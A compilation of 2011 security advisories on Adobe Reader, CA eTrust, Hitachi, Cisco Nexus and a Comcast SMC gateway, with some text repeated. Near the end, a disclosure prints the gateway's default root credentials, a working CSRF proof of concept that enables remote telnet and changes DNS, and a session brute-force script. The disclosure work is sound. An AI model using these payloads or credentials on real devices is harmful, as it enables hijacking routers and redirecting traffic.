[ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0061 CVE-2011-0602 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution. This is a different vulnerability from CVE-2011-0596, CVE-2011-0598 and CVE-2011-0599. A third party may execute arbitrary code through a crafted image. For more information: SA43207

SOLUTION: Updated packages are available via Red Hat Network.

I. BACKGROUND
Adobe Reader/Acrobat is a Portable Document Format (PDF) viewer. For more information, see the vendor's site found at the following link.
http://www.adobe.com/products/reader/

II. DESCRIPTION
JPEG2000 (JP2K) is an image file format similar to JPEG. In addition to JPEG markers, JP2K files also provide "boxes" that define different image properties. Several different JP2K record types are involved in the vulnerability. It is possible to increment a buffer index beyond the allocated data, and store pointers to file data at that location. This can result in the corruption of heap structures and application data, which leads to the execution of arbitrary code.

III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the web page or opening the file. Since PDF files can be embedded into web pages and parsed without interaction by default, this vulnerability can be exploited as a typical browser vulnerability. To exploit this vulnerability, a targeted user must load a malicious webpage created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. After the user visits the malicious web page, no further user interaction is needed.
IV. DETECTION
A full list of vulnerable Adobe products can be found in Adobe Security Bulletin APSB11-03.

V. WORKAROUND
Disabling the web view mode of Adobe Reader will prevent exploitation through the browser.

VI. VENDOR RESPONSE
Adobe has addressed this issue with an update. Further details and patches can be found at the following URL.
http://www.adobe.com/support/security/bulletins/apsb11-03.html

VII. CVE INFORMATION
This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE
11/17/2010 Initial Vendor Notification
11/17/2010 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure

IX. CREDIT
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES
Copyright © 2011 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA43207
RELEASE DATE: 2011-02-09

DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 
30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. 
ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. 
Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Affected packages
=================
-------------------------------------------------------------------
     Package              /  Vulnerable  /              Unaffected
-------------------------------------------------------------------
  1  app-text/acroread          < 9.4.7                  >= 9.4.7

Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details.

Workaround
==========
There is no known workaround at this time.

Resolution
==========
All Adobe Reader users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"

References
==========
[ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0158 CVE-2011-0758 CA eTrust Secure Content Manager and CA Gateway Security eCS component denial of service (DoS) vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition.
TITLE: CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID: SA43200
VERIFY ADVISORY: http://secunia.com/advisories/43200/
RELEASE DATE: 2011-02-10

DESCRIPTION: A vulnerability has been reported in CA Secure Content Manager, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to missing input validation in the eTrust Common Services Transport (ECSQdmn.exe) service when parsing requests and can be exploited to cause a heap-based buffer overflow via a specially crafted request sent to port 1882.
* CA Gateway Security version 8.1.

SOLUTION: Restrict access to the affected service.

PROVIDED AND/OR DISCOVERED BY: Sebastian Apelt via ZDI.
ORIGINAL ADVISORY:
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}

ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011

This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline.
To view mitigations for this vulnerability please see:
http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca

-- CVE ID: CVE-2011-0758
-- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors: CA
-- Affected Products: CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6184.

Authentication is not required to exploit this vulnerability.

-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2011-02-07 - Public release of advisory

-- Credit: This vulnerability was discovered by:
* Sebastian Apelt (sebastian.apelt@siberas.de)
VAR-201102-0385 No CVE Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: LOW
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues, and remote attackers can exploit vulnerabilities for cross-site scripting attacks to obtain sensitive information or hijack target user sessions. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable.

TITLE: Hitachi Tuning Manager Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID: SA43209
VERIFY ADVISORY: http://secunia.com/advisories/43209/
RELEASE DATE: 2011-02-08
DESCRIPTION: A vulnerability has been reported in Hitachi Tuning Manager, which can be exploited by malicious people to conduct cross-site scripting attacks. Certain unspecified input is not properly sanitised before being returned to the user. The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and 7.0.0 running on Windows and Solaris.

SOLUTION: Update to version 6.4.0-02 or 7.0.0-01.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY:
HS11-002: http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html
VAR-201102-0213 CVE-2011-0355 Cisco Nexus 1000V Virtual Ethernet Module denial of service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition.

The following Cisco products are vulnerable:
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2)
Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1)

The following VMware products are vulnerable:
ESXi 4.1
ESXi 4.0
ESX 4.1
ESX 4.0

VMware Security Advisory
Advisory ID: VMSA-2011-0002
Synopsis: Cisco Nexus 1000V VEM updates address denial of service in VMware ESX/ESXi
Issue date: 2011-02-07
Updated on: 2011-02-07 (initial release of advisory)
CVE numbers: CVE-2011-0355

1. Summary
Updated versions of the Cisco Nexus 1000V virtual switch address a denial of service in VMware ESX/ESXi.

2. Problem Description
a. This switch can be added to ESX and ESXi where it replaces the VMware virtual switch and runs as part of the ESX and ESXi kernel. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-0355 to the issue.
VMware customers are only affected by this vulnerability if they have chosen to deploy the Cisco Nexus 1000V virtual switch as a replacement for the VMware vNetwork Standard Switch or the VMware vNetwork Distributed Switch. VMware has confirmed that the VMware vNetwork Standard Switch and the VMware vNetwork Distributed Switch are not affected by the vulnerability. The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see section 5 for a link).

4. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355
Cisco bug ID CSCtj17451 (registered Cisco customers only)
http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtj17451

7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2011 VMware Inc. All rights reserved.
TITLE: Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of Service
SECUNIA ADVISORY ID: SA43084
VERIFY ADVISORY: http://secunia.com/advisories/43084/
RELEASE DATE: 2011-02-09

DESCRIPTION: A vulnerability has been reported in Cisco Nexus 1000V, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when processing 802.1Q tagged packets. This can be exploited to cause a crash when a virtual machine sends a packet on a vEthernet port.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY:
Cisco (CSCtj17451): http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html
VAR-201102-0084 CVE-2011-0886 SMC SMCD3G-CCR web interface cross-site request forgery vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic.

Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected.
TITLE: SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID: SA43199
VERIFY ADVISORY: http://secunia.com/advisories/43199/
RELEASE DATE: 2011-03-05

DESCRIPTION: Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks.

1) The web management application generates session identifiers incrementally, which can be exploited to brute force a valid session identifier via the "userid" cookie.

2) The web management application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while being logged-in to the application.

SOLUTION: Reportedly fixed in firmware version 1.4.0.49.2.

PROVIDED AND/OR DISCOVERED BY: Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Trustwave's SpiderLabs Security Advisory TWSL2011-001: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt

Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2

Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination.

Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs

Finding 1: Static Credentials
CVE: CVE-2011-0885

All SMCD3G-CCR gateways provided by Comcast have an administrative login of "mso" with the password of "D0nt4g3tme". These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root).

Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886

SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages, allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http.

The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information.

## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"></iframe>
</body>
</html>

## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post" name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form>
<script>
document.tF.submit();
</script>
</body>
</html>

## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post">
<input type="hidden" value="feat-admin-remote" name="file">
<input type="hidden" value="admin/" name="dir">
<input type="hidden" name="RemoteRange" value="0" />
<input type="hidden" name="rm_access" value="on" />
<input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" />
<input type="hidden" name="http_port" value="8080" />
<input type="hidden" name="http_enable" value="on" />
<input type="hidden" name="http_flag" value="1" />
<input type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" />
<input type="hidden" name="telnet_enable" value="on" />
<input type="hidden" name="telnet_port" value="2323" />
<input type="hidden" name="telnet_flag" value="1" />
<input type="hidden" name="Remote1=" value="" />
</form>
<script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>

## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post">
<input type="hidden" value="feat-wan-ip" name="file">
<input type="hidden" value="admin/" name="dir">
<input type="hidden" value="Fixed" name="DNSAssign">
<input type="hidden" value="0" name="dhcpc_release">
<input type="hidden" value="0" name="dhcpc_renew">
<input type="hidden" value="" name="domain_name">
<input type="hidden" value="" name="WDn">
<input type="hidden" name="SysName" value="" />
<input type="hidden" name="manual_dns_enable" value="on" />
<input type="hidden" name="DAddr" value="4.2.2.1" />
<input type="hidden" name="DAddr0" value="4" />
<input type="hidden" name="DAddr1" value="2" />
<input type="hidden" name="DAddr2" value="2" />
<input type="hidden" name="DAddr3" value="1" />
<input type="hidden" name="PDAddr" value="4.2.2.2" />
<input type="hidden" name="PDAddr0" value="4" />
<input type="hidden" name="PDAddr1" value="2" />
<input type="hidden" name="PDAddr2" value="2" />
<input type="hidden" name="PDAddr3" value="2" />
</form>
<script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>

If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be granted remote administration of the gateway device, including a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point.

Finding 3: Weak Session Management
CVE: CVE-2011-0887

SMCD3G-CCR gateways provided by Comcast utilize a predictable value to validate the active web management portal session. The epoch time of the beginning of the session is stored as a cookie labeled "userid". This provides a predictable range of session IDs that can be brute-forced.

The following PoC attempts to brute force the session IDs by requesting the admin page with an incrementing cookie and determining whether it wants to redirect to login.asp.

## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++ ))
do
  if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ]
  then
    echo "Session ID Found: $i"
  fi
  if [ $(($i % 100)) -eq "0" ]
  then
    echo "Currently at $i"
  fi
done

